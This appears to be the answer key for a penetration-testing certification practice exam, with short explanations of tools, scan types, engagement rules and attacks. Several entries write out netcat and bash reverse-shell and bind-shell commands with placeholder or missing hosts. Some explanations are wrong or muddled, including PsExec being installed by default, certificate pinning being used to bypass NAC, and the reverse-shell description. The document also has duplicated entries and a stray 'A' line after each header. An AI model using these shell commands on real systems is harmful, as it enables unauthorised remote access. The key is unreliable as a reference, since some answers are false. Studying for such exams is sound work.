C. The device in this example is most likely a domain controller running on Windows Server. This is evidenced by the fact that the default DNS server, LDAP, and Kerberos ports are open on the system.

Answer 773

A

C. Chkconfig is a tool for managing which run levels a service will run at. Chkconfig can be used to view or change the run level of a service. Using chkconfig –del will set the named service to not run at the current run level and will remove the persistence.

Answer 774

A

A. A master services agreement (MSA) defines general terms that will apply to multiple future agreements. Therefore, an MSA is essentially a contract that defines the terms under which future work will be completed. Specific projects governed by the MSA will be defined by a statement of work (SOW). The fact that the client wants to sign an MSA indicates that they probably want to use your firm for multiple engagements.

Answer 775

A

C. Netcat is an open source network debugging and exploration utility that can read and write data across network connections, using the TCP/IP protocol. Netcat is also a popular remote access tool, and it has a small footprint that makes it easily portable to many systems during a penetration test. Setting up a reverse shell with netcat on Linux looks like this: nc [IP of remote system] [port] -e /bin/sh
- Setting up a reverse shell with netcat on Windows looks like this: nc [IP of remote system] [port] -e cmd.exe
- It is also fairly easy to set up netcat as a listener by using this: nc -l -p [port]

Answer 776

A

A. To harden a server system, you should make sure only the services and applications necessary for its role are installed. The netstat command can be used to check for listening network ports on the system. This will reveal which services are running on the system.

Answer 777

A

B. Black box tests are sometimes called zero knowledge tests because they replicate what a typical external attacker would encounter. Testers are not provided with any access or information. A white box test is performed with full knowledge of the underlying network. A gray box test may provide some information about the environment to the penetration testers without giving full access. Objective-based assessments are usually designed to assess the overall security of an organization.

Answer 778

A

A and E. The many unsuccessful login attempts is a sure sign that the penetration tester is using a brute-force password cracking tool to gain access to the system. The Hydra and Medusa utilities are both capable of running a brute-force attack.

Answer 779

A

C. The -le relational operator can be used in both Bash and PowerShell to test whether one value is numerically less than or equal to the other.

Answer 780

A

A and B. In both a parameter pollution exploit and an insecure direct object reference exploit, the penetration tester modifies a parameter in an HTTP request to gain unauthorized access to information. For example, after authenticating to a web application, the tester could modify the /search?q= parameter in a URL to trick the application into supplying information that the user account shouldn’t be able to see.

Answer 781

A

B. This is an example of risk transference. Rather than avoid the risk by moving to a new location or mitigate the risk with seismic upgrades to the facility, the client has moved the risk to the insurance company.

Answer 782

A

E. When creating your written report of findings after completing a penetration test, you should report your recommendations in the Conclusion section.

Answer 783

A

B. When you normalize the data from a penetration test, you aggregate all the data generated by all of the different tools and processes you used during the test and format it such that it is consistent and correlated. The goal is to make it such that the client can read the aggregated data and understand what happened during the test and when.

Answer 784

A

D. In this scenario, since the testing was performed by an on-staff junior administrator, it may be in the company’s best interest to create a request for proposal (RFP) from a professional penetration testing company to agree with the assessments and to give the company any vulnerability findings. An RFP is a document that solicits proposal, often made through a bidding process.

Answer 785

A

D. The written report of findings contains highly sensitive information and should therefore be securely handled. It should not be stored in a manner that would allow it to be easily stolen. In this scenario, storing the report in an encrypted file on a file server would make it more difficult for the file to be stolen than the other options listed.

Answer 786

A

A. Dumpster diving occurs when an attacker searches through the target organization’s garbage looking for sensitive information.

Answer 787

A

A. In this scenario, you would need to receive the bands and frequencies used by the client’s wireless devices in order to proceed with the wireless penetration test. Wireless devices may operate on a number of bands and frequencies, but knowing the exact bands and frequencies would allow a penetration tester to conduct the wireless penetration test as requested.

Answer 788

A

D. In this scenario, since you are trying to preform OSINT on the staff of the company, it would be best to send spoofed emails to the staff to see whether they will respond with sensitive information. Penetration testers need to be ready to incorporate social engineering in their test plan if allowed by the rules of engagement and included in the scope of work.

Answer 789

A

E. The case structure is the best option presented to evaluate the user’s choice of multiple selections and run the appropriate set of commands as a result.

Answer 790

A

A. Certificate pinning associates a host with an X.509 certificate (or a public key) and then uses that association to make a trust decision. You use certificate pinning to help prevent man-in-the-middle attacks. When communicating over public networks, it is important to send and receive information securely.

Answer 791

A

C. The term de-confliction refers to the process of communicating between the client and the tester to determine whether an attack detected during a penetration test is coming from an authorized penetration tester or whether it is a real attack instigated by some third-party hacker.

Answer 792

A

C and D. An internal penetration testing team may be too closely affiliated with the organization. For example, they may worry that a vulnerability discovered during a penetration test may reflect poorly on their team because they likely designed and continue to maintain the network being tested. This could cause a lack of objectivity when conducting penetration tests.

Answer 793

A

D. A white box test is performed with full knowledge of the underlying technology, configuration, and settings of the target organization’s network. In a black box test, the testers are not provided with access to or information about the target environment. Goals-based or objective-based assessments are usually designed to assess the overall security of an organization.

Answer 794

A

D. The Dirbuster utility is a brute-force utility that can be used by penetration testers to discover directories and files on a web server or an application server, including hidden files or directories.

Answer 795

A

D. Open source intelligence (OSINT) tools and techniques are those that go through publicly available information for organizational and technical details that might prove useful during the penetration test. OSINT is information that can be gathered easily. OSINT is often used to determine the organization’s footprint, which includes a listing of all of the systems, networks, and other technology that an organization has.

Answer 796

A

A. In this example, the nmap utility was used to run a TCP SYN scan. However, the –v option was included to increase the verboseness of the output.

Answer 797

A

D. The nmap 192.168.1.1 -O command causes the nmap utility to use TCP/IP stack fingerprinting to determine the operating system installed on the remote host.

Answer 798

A

A. The Simple Object Access Protocol (SOAP) is a messaging protocol specification that defines how structured information can be exchanged between web applications. SOAP project files can be created from Web Services Description Language (WSDL) files.

Answer 799

A

A and B. By default, an FTP server uses two ports: 20 and 21. Port 20 is used to transfer data between the FTP server and the FTP client. Port 21 is used to send commands between the FTP client and the FTP server.

Answer 800

A

C. Piggybacking attacks rely on following employees in through secured doors or other entrances. Higher-security organization may use mantraps to prevent piggybacking and tailgating. A properly implemented mantrap will allow only one person through at a time, and that person will have to unlock two doors, only one of which can be unlocked and opened at a time.

Answer 801

A

A. Mimikatz can be used to compromise Kerberos-based authentication systems, including generating “golden” and “silver” Kerberos tickets.

Answer 802

A

A. Netcat can be used to set up a Telnet server in a matter of seconds. You can specify the shell you want Netcat to run at a successful connection with the -e parameter. In this scenario, the proper syntax would be nc -lp 444 -e /bin/bash. The nc - tells Windows to run the nc.exe file with the following arguments:
- -l: Listen mode, for inbound connections
- -p: Specifies a port to listen for a connection on
- -e: Tells what program to run once the port is connected to (cmd.exe)
- -v: Specifies to be verbose, printing out messages on Standard Error, such as when a connection occurs

Answer 803

A

B. In this example, the nmap utility was used to run a TCP connect scan. The nmap 10.0.0.1 –sT command can be used to run this kind of scan. Note that the output of the command looks almost identical to the output of a TCP SYN scan.

Answer 804

A

B. Debuggers allow you to analyze an application as it executes. Typically, you can pause the execution of the application step by step or you can allow it to run until it reaches a certain point in the code. Doing this may allow you to identify a vulnerability that can be exploited as a part of a penetration test. However, you must have a strong background in programming or application testing to do this effectively.

Answer 805

A

A. In this scenario, the attacker was using a redirect. The security analyst should block URL redirections. A URL redirect is a web server function that sends a user from one URL to another. Redirects commonly take the form of an automated redirect that uses one of a series of status codes defined within the HTTP protocol. So, when a web browser attempts to open a URL that has been redirected, a page with a different URL is opened.

Answer 806

A

D. ARP spoofing is a technique in which an attacker sends (spoofed) Address Resolution Protocol (ARP) messages onto a local area network. Normally, the goal is to associate the attacker’s Media Access Control (MAC) address with the IP address of another host, such as the default gateway, causing any traffic meant for that IP address to be sent to the attacker instead. ARP spoofing may allow an attacker to intercept data frames on a network, modify the traffic, or stop all traffic.

Answer 807

A

C. In this scenario, the best approach would be to conduct an impact analysis with the client and determine their tolerance to impact. Is the information to be gained by using the vulnerability scanner worth the potential risk? For some organizations, the risk may be worth the benefit. For others, it may not. Either way, the penetration tester should not use the tool until the impact analysis is complete and the client is aware of the risks.

Answer 808

A

A. Every network service enabled on a server expands that server’s attack surface. Therefore, only those services that are actually needed should be installed. In this scenario, a web server probably doesn’t need DNS, DHCP, printing, or email services running. These should be removed.

Answer 809

A

A. PsExec is a command-line utility that is installed by default on Windows systems that lets you interactively execute processes on other Windows systems.

Answer 810

A

C. Notice that the hostname of the device under Hostnames > Name begins with android. From this, you can reasonably infer that the device is most likely a mobile phone or tablet running the Android operating system.

Answer 811

A

A. The Gramm-Leach-Bliley Act (GLBA) regulates how financial institutions handle customers’ personal information. For example, it requires companies to have a written information security plan in place that identifies processes and procedures intended to protect that information.

Answer 812

A

A and B. Both IDA and Hopper can be used for decompilation. During this process, an executable file is reverse-compiled into source code, allowing you to examine it for vulnerabilities.

Answer 813

A

C. This is an example of DNS cache poisoning. Instead of compromising a heavily protected DNS server, the penetration tester simply compromises the DNS cache on relatively less secure workstations. The net effect is the same. Malware is a common delivery vehicle for DNS cache poisoning exploits.

Answer 814

A

D. The searchsploit utility is a command-line search tool that is used to query the online Exploit-DB database for known exploits.

Answer 815

A

A. In this example, the nmap utility was used to scan port 80 on each of the 10 hosts listed in the range of IP addresses. This is done by running nmap with the –p 80 option.

Answer 816

A

C. The penetration tester in this scenario exploited the firewall administrator’s failure to modify the default account settings on the firewall device. Most network devices, including access points, routers, firewalls, and so on, come from the factory preconfigured with default administrative credentials. These default account settings are well documented on the Internet. If the administrator forgets to change them, then the tester can use them to gain administrative access to the device.

Answer 817

A

D. Fence jumping occurs when an unauthorized person simply jumps over or cuts through a physical barrier designed to control access. In this scenario, the tester penetrated the physical fence barrier by cutting a hole in it.

Answer 818

A

A. A reverse shell opens a communication channel on a port and waits for incoming connections. The client’s machine acts as a server and initiates a connection to the tester’s machine. This is what is done by using the following:
- bash -i >& /dev/tcp//443 0>&1
- Given the options, option A is the best option. Options B and C will not work because they are using the and not the , and option D is not correct because it is using the improper syntax.

Answer 819

A

C. When referencing a value from an array, Ruby uses the following syntax: array_name[position]. In this example, the puts command is being told to use the second value of the array named PrimeNumArray.

Answer 820

A

B. Additional authorization may be needed for many penetration tests, especially those that involve complex IT infrastructure. Third parties are often used to host systems such as software as a service (SaaS), platform as a service (PaaS), or infrastructure as a service (IaaS) cloud providers. A penetration test could impact these providers. This is why it is crucial to determine what/if third-party providers or partners may be in scope and to obtain authorization. If third parties are involved, you will also want to make sure that both the client and the third party are aware of any potential impacts from the penetration test.

Answer 821

A

A. In a gray box penetration test, the tester has partial knowledge of the target. This can be used to simulate a malicious insider attack conducted by an average employee. In a black box penetration test, the tester has no prior knowledge of the target. In a white box test, the tester has extensive knowledge of the target.

Answer 822

A

B. In this scenario, the client is asking the tester to conduct a goal-based assessment. Goals-based assessments are conducted for specific reasons. Some examples include validating a new security design, testing an application or service infrastructure before it enters production, or assessing the security of an organization. A premerger assessment is usually conducted on an organization prior to it merging with another. A compliance-based assessment is done to ensure that an organization is in compliance with government regulations or corporate policies. A supply chain assessment involves testing an organization’s vendors.

Answer 823

A

D. An indicator of prior compromise communication trigger happens when a penetration tester discovers that the network or a system has already been compromised previously by another attacker. In this situation, the tester usually communicates the discovery with the client immediately instead of waiting until the test is complete.

Answer 824

A

B. One technique that can be used to establish persistence during a penetration test involving Linux systems is to schedule jobs using cron to run exploit scripts or start daemons. This ensures these jobs happen automatically without intervention once you have left the system.

Answer 825

A

A. An indicator of prior compromise communication trigger happens when a penetration tester discovers that the network or a system has already been compromised previously by another attacker. In this situation, the tester usually communicates the discovery with the client immediately instead of waiting until the test is complete.

Answer 826

A

A and B. The nmap 192.168.1.1 -sS command causes the nmap utility to conduct a SYN port scan of the specified target system. Likewise, the nmap 192.168.1.1 command also causes the nmap utility to conduct a SYN port scan of the specified target system because a SYN scan is the default used if no other scan type is specified.

Answer 827

A

A. The –sS option causes nmap to run a TCP SYN scan. In this scan, nmap sends a TCP SYN packet to a target host, and then the target host responds with a SYN ACK packet. However, instead of finishing the connection, nmap sends a reset packet to the target host.

Answer 828

A

C. Web scraping automatically extracts data and presents it in a format that a tester can easily make sense of. In this scenario, Python is being used as the scraping language compared to a powerful library called BeautifulSoup. BeautifulSoup is a Python package for parsing HTML and XML documents. It creates a parse tree for parsed pages that can be used to extract data from HTML, which is useful for web scraping. Beautiful Soup helps a tester pull particular content from a web page, remove the HTML markup, and save the information. It is a tool for web scraping that helps clean up and parse the documents that have been pulled down from the Web.

Answer 829

A

C. System hardening, also known as operating system hardening, helps minimize security vulnerabilities. The purpose of system hardening is to get rid of as many security risks as possible. This is usually done by removing all nonessential software programs and utilities from the computer. The goal of systems hardening by removing unused programs, accounts functions, applications, ports, permissions, access, etc., is that attackers have fewer opportunities to gain access to your network. There are several types of system hardening activities. They include the following:
- Application hardening
- Operating system hardening
- Server hardening
- Database hardening
- Network hardening

Answer 830

A

B and D. Impersonation is a social engineering technique that can be used by a penetration tester to gain physical access to the target’s facility. In this scenario, the receptionist allowed the tester to access the organization’s facility because the tester appears to be from a trusted vendor. The tester also used a USB key drop exploit, hoping that the user would insert the flash drive into their computer and install the malware it contains.

Answer 831

A

C and E. Impersonation is a social engineering technique that can be used by a penetration tester to gain the trust of the target organization’s employees. In this scenario, the employees trusted the tester because emails appeared to be coming from another employee. The tester leveraged this trust to elicit sensitive information from those employees. This is sometimes called business email compromise.

Answer 832

A

B. In this scenario, the wireless network can be hardened by changing the default administrative username and password on the wireless controller. Lists of default usernames and passwords are readily available on the Internet and should not be used.

Answer 833

A

A. The chage command can be used on Linux systems to configure password aging for user accounts.

Answer 834

A

A. The tester will want to create a Netcat listener that waits for the inbound shell from the target machine. To get a shell, Netcat uses nc -nvlp 443 to listen for incoming connections Using this syntax, the tester is telling Netcat (nc) to not resolve names (-n), to be verbose printing out when a connection occurs (-v), and to listen (-l) on a given local port (-p).

Answer 835

A

B. When creating your written report of findings after completing a penetration test, you should identify the standard or guidelines you used to conduct the test in the Methodology section. In this example, you would inform the reader that you used the EC-Council’s CEH methodology.

Answer 836

A

D. The issue here is that the network uses a switch instead of a hub. The switch learns the MAC addresses of each network interface connected to each switch port. It only transmits frames to the specific port to which the destination network interface is attached. Because of this, your laptop never sees frames transmitted to any other host on the network.

Answer 837

A

D. Fingerprinting Organizations with Collected Archives (FOCA) is a utility that you can use to gather metadata from an organization’s documents, such as Word, PowerPoint, OpenOffice, and Adobe Reader files. FOCA searches popular search engines, such as Google and Bing, for these files and extracts any metadata they may contain.

Answer 838

A

C. PsExec is a tool designed to allow penetration testers to run programs on remote systems via SMB on port 445. That makes it an extremely useful tool. PsExec’s ability to run processes remotely requires that both the local and remote computers have file and print sharing (i.e., the Workstation and Server services) enabled and the default Admin$ share, which is a hidden share that maps to the \windows directory.

Answer 839

A

D and E. Both Medusa and Hydra utilities can be used to conduct brute-force password attacks.

Answer 840

A

A. Network Mapper (nmap) is used to discover hosts and services on a computer network by sending packets and analyzing the responses. Nmap will identify what devices are running on a client’s systems, discover hosts and services that are available, find open ports, and detect security risks. In this scenario, the client did not disable Telnet because port 23 is still open. Telnet is a client-server protocol, based on a reliable connection-oriented transport. Typically, this protocol is used to establish a connection to Transmission Control Protocol (TCP) by using port 23, where a Telnet server application (telnetd) is listening.

Answer 841

A

A. A TCP SYN flood (also known as an SYN flood) is a form of denial-of-service (DDoS) attack in which a tester sends a succession of SYN requests to the target’s system in an attempt to consume enough server resources to make the system unresponsive to genuine traffic. This exploits part of the normal TCP three-way handshake and consumes resources on the targeted server and renders it unresponsive.

Answer 842

A

C. The Common Vulnerability Scoring System (CVSS) is an industry standard for assessing the severity of security vulnerabilities. It provides a technique for scoring each vulnerability on a variety of measures. Security analysts often use CVSS ratings to prioritize response actions. Each measure is given a descriptive rating and a numeric score.

Answer 843

A

C. Bluejacking is when an attacker sends unsolicited messages over Bluetooth devices. Bluejacking is a hacking method that allows an individual to send anonymous messages to Bluetooth-enabled devices within a certain radius. First, a hacker scans their surroundings with a Bluetooth-enabled device, searching for other devices. The hacker then sends an unsolicited message to the detected devices.

Answer 844

A

A. Impacket is a collection of Python classes for working with network protocols. Impacket provides a wide range of tools, including the ability to authenticate with hashes once you have captured them. Metasploit’s SMB capture mode, Responder, and Wireshark can all capture SMB hashes from broadcasts, but in this scenario, you also want the ability to authenticate with hashes once you’ve captured the messages.

Answer 845

A

A. To harden a Linux-based server system, you should make sure a host-based firewall is running by enabling and configuring iptables. You should first close all network ports in the firewall and then open only those required by specific services running on the system.

Answer 846

A

D. In this scenario, you are discussing technology. Technological controls also provide effective defenses against many security threats. There are three major categories of remediation activities. The categories are people, process, and technology.

Answer 847

A

C. The penetration tester used shoulder surfing techniques in this scenario. In shoulder surfing, the tester observes information that employees type or display on their computers in an attempt to gather sensitive information. For example, the tester may use shoulder surfing to gather usernames, passwords, email addresses, phone numbers, file server share names, and so on.

Answer 848

A

C. There are seven steps of the Cyber Kill Chain that enhanc visibility into an attack and enrich an analyst’s understanding of an adversary’s tactics, techniques, and procedures. The cyber kill is a methodology for understanding how an attacker will conduct the activities necessary to cause harm to an organization. An understanding of the Cyber Kill Chain will greatly assist an information security professional in establishing strong controls and countermeasures, which will serve to protect their organization’s assets. This question describes the Reconnaissance phase, the first stage of the Cyber Kill Chain. In this stage, the attacker is assessing the target from outside of the organization from both a technical and nontechnical perspective. In this stage, the attacker is working to determine which targets will return the most benefit for the resources expended in exploiting the target’s information systems. The attacker will be looking for information systems with few protections or exploitable vulnerabilities.

Answer 849

A

A. The <= relational operator can be used in both Python and Ruby to test whether one value is numerically less than or equal to the other.

Answer 850

A

A. Certificate pinning associates a host with an X.509 certificate (or a public key) and then uses that association to make a trust decision. You use certificate pinning to help prevent man-in-the-middle attacks. When communicating over public networks, it is important to send and receive information securely.

Answer 851

A

C. A full scan will provide you with more useful results because it includes more tests. There is no requirement in the scenario that the tester should avoid detection, so a stealth scan is not necessary. But because this is a black box test, it would be best to run a full scan on the network.

Answer 852

A

D. The term de-escalation refers to the process of communicating between the client and the tester to dial back the intensity of exploits or even stop them all together because of unsafe situations they may be causing.

Answer 853

A

C. Bluejacking is when an attacker sends unsolicited messages over Bluetooth devices. Bluejacking is a hacking method that allows an individual to send anonymous messages to Bluetooth-enabled devices within a certain radius. First, a hacker scans their surroundings with a Bluetooth-enabled device, searching for other devices. The hacker then sends an unsolicited message to the detected devices.

Answer 854

A

B. The amount of information uncovered in a penetration test is heavily dependent upon the rules of engagement and the type of assessment used. For example, a white box test usually provides more complete information than a black box test can. Likewise, if certain systems and devices are identified as out of scope, then any vulnerabilities they harbor will not be discovered. This language in the agreement is intended to protect you in the event a vulnerability is identified in an out-of-scope system after the test is complete.

Answer 855

A

A. The Common Attack Pattern Enumeration and Classification (CAPEC) list is a resource intended to help identify and document attacks and attack patterns. Users are allowed to search attacks by their mechanism or domain and then break down each attack by various attributes and prerequisites. CAPEC also suggests solutions and mitigations, which is useful in identifying controls when writing a penetration test report.

Answer 856

A

B. By flooding the router with bogus ICMP traffic, the tester makes it difficult for the router to service legitimate network requests. Because multiple hosts were used to conduct the stress test, this is an example of standard distributed denial of service (DDoS) attack.

Answer 857

A

A. Nmap is the most commonly used command-line vulnerability scanner and is a free, open source tool. It provides a broad range of capabilities, including multiple scan modes intended to bypass firewalls and other network protection devices. Nmap is a port scanner. To scan for ports, you will want to use the -p (only scan specified ports). This option specifies which ports you want to scan and overrides the default scan. Individual port numbers or ranges are acceptable. Ranges are separated by a hyphen (for example 1–1023). The beginning and/or end values of a range may be omitted, causing nmap to use 1 and 65535, respectively. So, you can specify -p- to scan ports from 1 through 65535. Port scanning a system simply requires that nmap be installed and that you provide the target system’s hostname or IP address.

Answer 858

A

A. Among other things, the term situational awareness refers to a state of common understanding between all members of the penetration testing team to ensure that every team member is aware of what the others are doing.

Answer 859

A

D. The rules of engagement include the following:
o The timeline when testing will be conducted
o What locations, systems, applications, and other potential targets are to be included/excluded
o The data handling requirements for information gathered
o What behaviors to expect from the target
o What resources are committed to the test
o Any legal concerns that should be addressed
o The when/how communication will occur
o Who to contact in case of events
o Who is permitted to engage in the penetration testing team

Answer 860

A

A. Normally, when NAC is implemented with IPSec, clients must meet company security policies before they are allowed to connect to the internal secure network. If they do, they are assigned a digital certificate that allows them to communicate with other systems on the internal secure network. To bypass NAC, certificate pinning can be used to assign a digital certificate to the testers’ systems without proving they are in compliance every time they connect.

Answer 861

A

D. The ncat utility is an updated and improved version of the older netcat utility.

Answer 862

A

C and E. There are a variety of tools that assist with this OSINT collection:
- Censys is a web-based tool that probes IP addresses across the Internet and then provides penetration testers with access to that information through a search engine.
- Fingerprinting Organizations with Collected Archives (FOCA) is an open source tool used to find metadata within Office documents, PDFs, and other common file formats.
- Maltego is a commercial product that assists with the visualization of data gathered from OSINT efforts.
- nslookup tools help identify the IP addresses associated with an organization. Recon-ng is a modular web reconnaissance framework that organizes and manages OSINT work.
- Shodan is a specialized search engine to provide discovery of vulnerable Internet of Things (IoT) devices from public sources.
- theHarvester scours search engines and other resources to find email addresses, employee names, and infrastructure details about an organization. whois tools gather information from public records about domain ownership.

Answer 863

A

D. Advanced persistent threats (APTs) are often sponsored by nation-states and thus are very well funded and have access to high-end technical resources and knowledge. As such, an APT typically poses the greatest threat of all the actors on the adversary tier list.

Answer 864

A

D. Privilege escalation attacks are frequently categorized into two major types: vertical and horizontal. Vertical escalation attacks focus on testers gaining higher privileges. Horizontal escalation attacks move sideways to other accounts or services that have the same level of privileges. An unquoted service path is a vulnerability in Windows. When a service is started, Windows tries to locate it. Usually, services are well-defined with quotation marks. But, there are times when a service path might contain spaces or are not surrounded by quotation marks. Testers can use the unquoted service paths to escalate privileges.

Answer 865

A

A. Virtual Network Computing (VNC) connections can be used to remotely manage Windows, Macintosh, or Linux systems over a network connection using a graphical user interface, as long as the necessary software is installed on both the local and remote systems.

Answer 866

A

A. Confidentiality controls seek to prevent disclosure attacks. Even though confidentiality agreements (CAs) are legal documents that help to enforce confidential relationships between two parties, this question asks why it is important to maintain the confidentiality of findings. If an attacker were to receive word of findings during a penetration test, they could use those to compromise your client’s network.

Answer 867

A

C. theHarvester is a tool available on some Linux distributions, such as Kali Linux, that can be used to query search engines to discover email addresses, employee names, and other details about the target organization.

Answer 868

A

B. When making a comparison between two values in a Ruby script to see whether they are equal, you use the == relational operator.

Answer 869

A

C. A scope creep occurs when additional items are added to the scope of an assessment. The tester has gone beyond the scope of the initial assessment agreement.

Answer 870

A

A. A ping sweep is an example of a discovery scan. The goal of a ping sweep is not to interrogate every system. Instead, it simply seeks to identify the presence of every reachable system on the network.

Answer 871

A

C. Because this is a gray box penetration test, you should probably ask the client if they want the test performed on-site or if they want you to test from a remote off-site location. An on-site test would likely produce better results, but it would also cost more because the penetration testers would incur travel expenses. An off-site test would cost less because it wouldn’t require travel expenses, but it may produce lower quality results because the testers aren’t physically on-site.

Answer 872

A

B. Nessus is a commercial vulnerability scanning tool used to scan a wide variety of devices, but it is not part of the tools available for OSINT gathering. There are a variety of tools that assist with this OSINT collection:
- Censys is a web-based tool that probes IP addresses across the Internet and then provides penetration testers with access to that information through a search engine.
- Fingerprinting Organizations with Collected Archives (FOCA) is an open source tool used to find metadata within Office documents, PDFs, and other common file formats.
- Maltego is a commercial product that assists with the visualization of data gathered from OSINT efforts.
- Nslookup tools help identify the IP addresses associated with an organization.
- Recon-ng is a modular web reconnaissance framework that organizes and manages OSINT work.
- Shodan is a specialized search engine to provide discovery of vulnerable Internet of Things (IoT) devices from public sources.
- theHarvester scours search engines and other resources to find email addresses, employee names, and infrastructure details about an organization.
- Whois tools gather information from public records about domain ownership.

Answer 873

A

B and C. The “Password must meet complexity requirements” and the “Minimum password length” Group Policy settings can be used to enforce a degree of password complexity. By default, the “Password must meet complexity requirements” policy requires passwords be at least six characters long and contain characters from three of the following four categories: uppercase letters, lowercase letters, numbers, and special characters. The minimum password length defines the least number of characters that a password may contain.

Answer 874

A

A. A gray box test is a blend of black box and white box testing. A gray box test usually provides limited information about the target to the penetration testers but does not provide full access, credentials, or configuration information. A gray box test can help focus penetration testers’ time and effort while also providing a more accurate view of what an attacker would actually encounter. In a black box test, the testers are not provided with access to or information about the target environment. Goals-based or objective-based assessments are usually designed to assess the overall security of an organization. A white box test is performed with full knowledge of the underlying network.

Answer 875

A

B. In this scenario, the .. operators are the revealing giveaway that the attacker was attempting to conduct a directory traversal attack. This particular attack sought to break out of the web server’s root directory and access the /etc/passwd file on the server. A directory traversal attack is an HTTP attack that allows attackers to access restricted directories and execute commands outside of the web server’s root directory.

Answer 876

A

C. Forbidding employees from using external cloud-based services such as Google Drive is an example of a process-based mitigation strategy.

Answer 877

A

D. Swagger is an open source framework designed to help developers design, build, document, and test Representational State Transfer (REST) web services. REST is an alternative to the SOAP protocol. In fact, REST has started to replace SOAP as the framework of choice in most modern web applications.

Answer 878

A

C. In this scenario, the only one that is not part of manufacturing is the real-time operating system (RTOS). RTOS is any operating system intended to serve real-time applications that process data as it comes in, typically without buffer delays. Industrial control system (ICS) is a term used to describe different types of control systems and associated instrumentation, which include the devices, systems, networks, and controls used to operate and/or automate industrial processes. Supervisory control and data acquisition (SCADA) systems are used to monitor and control production processes in a wide range of industries, including manufacturing, water treatment, mining, oil refining, transportation, and power distribution. A programmable logic controller (PLC) is an industrial solid-state computer that monitors inputs and outputs and makes logic-based decisions for automated processes or machines. A PLC is an industrial digital computer that has been adapted for the control of manufacturing processes, such as assembly lines, or robotic devices, or any activity that requires high reliability control and ease of programming and process fault diagnosis.

Answer 879

A

A. A man-in-the-middle attack happens when communication between two parties is intercepted by an outside entity. Man-in-the-middle attacks are a common kind of cybersecurity attack that allows an attacker to eavesdrop on the communication between two targets. The attack takes place in between two legitimately communicating hosts, allowing the attacker to “listen” to a conversation.

Answer 880

A

C. The first step in most penetration testing engagements is determining what should be tested, often called the scope of the assessment. The scope of the assessment determines what penetration testers will do and how their time will be spent. Thus, this is a major impact on the budget of an assessment.

Answer 881

A

B and C. The ROE should identify which locations, systems, applications, or other potential targets are included in or excluded from the test. This should identify any third-party service providers that may be impacted by the test such as ISPs, cloud service providers, or security monitoring services. Billing and arbitration procedures will likely be addressed in the general contract between you and the client, not in the ROE. It is unlikely that the client will want you to notify their competitors that you are testing their security.

Answer 882

A

A. The Payment Card Industry Data Security Standard (PCI-DSS) is a set of security controls that businesses are required to implement to protect credit card data. For example, one of the requirements specifies that a strong password policy be in place within the organization.

Answer 883

A

D. The rules of engagement have been defined appropriately in this scenario. For example, it is quite appropriate to define what defensive behaviors the target is allowed to use during the test. Likewise, a white box test will likely include detailed information about the internal network. It’s also not uncommon for third-party service providers to be excluded from the test.

Answer 884

A

A, F, and G. In this scenario, the tester should recommend that the client increase their password complexity requirements since the tester was able to crack them by using a dictionary attack. The tester should also recommend that all employees take security awareness training, since it was a member of the IT department who gave up pertinent information when the tester used a phishing technique. The tester should also recommend upgrading the cipher suite that is used for the VPN solution. A cipher suite is a set of algorithms that help secure network connections that use Transport Layer Security (TLS) or Secure Socket Layer (SSL). The algorithms that cipher suites usually contain include a key exchange algorithm, a bulk encryption algorithm, and a message authentication code (MAC) algorithm.

Answer 885

A

C. A rainbow table is a precomputed table of hash values that can be used to reverse hash functions. For example, if a plaintext password has been protected by hashing it, you may be able to use a rainbow table to reverse the hashing function and expose the original plaintext password.

Answer 886

A

B. The default ports used by the FTP service are 20 and 21. FTP is used to transfer files between hosts over a network connection. FTP is a very old and insecure protocol. All information transmitted between the FTP server and client is sent unencrypted, including authentication information. By sniffing traffic going in and out of this host on ports 20 and 21, you may be able to capture usernames and passwords.

Answer 887

A

C. When making a comparison between two values in a PowerShell script to see if they are equal, you use the -eq relational operator.

Answer 888

A

C. When declaring a local variable, Ruby uses a syntax of _variable_name = value.

Answer 889

A

D. The < relational operator can be used in both Python and Ruby to test whether one value is numerically less than the other.

Answer 890

A

A. In this scenario, the PowerShell command given will execute a remote script. By using the PowerShell IEX command, it will invoke an expression. The IEX cmdlet evaluates or runs a specified string as a command and returns the results of the expression or command. The PowerShell Invoke-Command cmdlet runs commands on a local or remote computer and returns all output from the commands, including errors. By using a single Invoke-Command command, you can run commands on multiple computers.

Answer 891

A

D. The laws and regulations that apply to penetration testing and penetration testers vary from state to state within the United States. That means you need to understand what laws apply to the work you’re doing. In this scenario, you need to check all federal, state, and local laws that apply to the assessment you plan to carry out. It is recommended that you retain the services of an attorney to keep yourself out of trouble.

Answer 892

A

A and E. The LLMNR protocol is loosely based on the DNS packet format and allows IPv4 and IPv6 hosts to perform name resolution for other hosts on the same local network without a DNS server. It is supported by both Windows and Linux hosts.

Answer 893

A

C and D. The greatest risks to the POS systems in this scenario are that they are exposed to the Internet and that they are running an unsupported (and therefore highly vulnerable) operating system. The client should isolate the POS systems on their own subnet away from the Internet. They should also upgrade their hardware and software to newer versions to eliminate risks from running an ancient operating system.

Answer 894

A

C. After a penetration test is complete, it is not uncommon for the client to ask the tester to come back and retest everything to make sure the problems discovered during the test have been remediated. This process is sometimes called follow-up actions.

Answer 895

A

A. Custom Word List (CeWL) Generator is a Ruby application that allows a tester to scour a website based on a URL and depth setting and then generate a wordlist from the files and web pages it finds. Running CeWL against a target organization’s websites can help generate a custom wordlist. Building a custom wordlist can be particularly useful if you have gathered a lot of information about your target organization.

Answer 896

A

B. The default port for an SMTP email relay service is port 25. Most Linux distributions use an email daemon such as sendmail for internal messaging. However, it can also be used to send messages over the network via SMTP on port 25. Normally, this port is firewalled on a public-facing server to prevent the daemon from being used for unauthorized email relay by spammers. Occasionally, you may find servers where someone opened port 25 and forgot to close it, making the host vulnerable.

Answer 897

A

B. Many people are naturally motivated to help others in distress. This is called urgency. When they believe someone needs help, they may bend or break the rules to help the person out.

Answer 898

A

B. The written report of findings contains highly sensitive information and should therefore be disposed of securely. It should not be disposed of in a manner that would allow it to be stolen or reconstructed. In this scenario, physically destroying optical discs will make it much harder to recover the data from the reports.

Answer 899

A

D. In this scenario, the confidentiality of the findings was not maintained. The blog post revealed far too much information about the client. It may take the client weeks or even months to address the issues discovered in the assessment. By publishing the findings publicly, you exposed your client to potential attacks.

Answer 900

A

C. Chkconfig is a tool for managing which run levels a service will run at. Chkconfig can be used to view or change the run level of a service. Using chkconfig –del will set the named service to not run at the current run level and will remove the persistence.

Answer 901

A

B and D. In this scenario, you first mapped vulnerabilities you found in your scans to possible exploits. Then you modified those exploits to work on the older server operating systems.

Answer 902

A

A. The penetration tester is using social proof as a motivating factor. Because it appears that more than 1,000 people have had a positive experience with the website, most of the employees will probably trust the site, even if it asks them to divulge sensitive information.

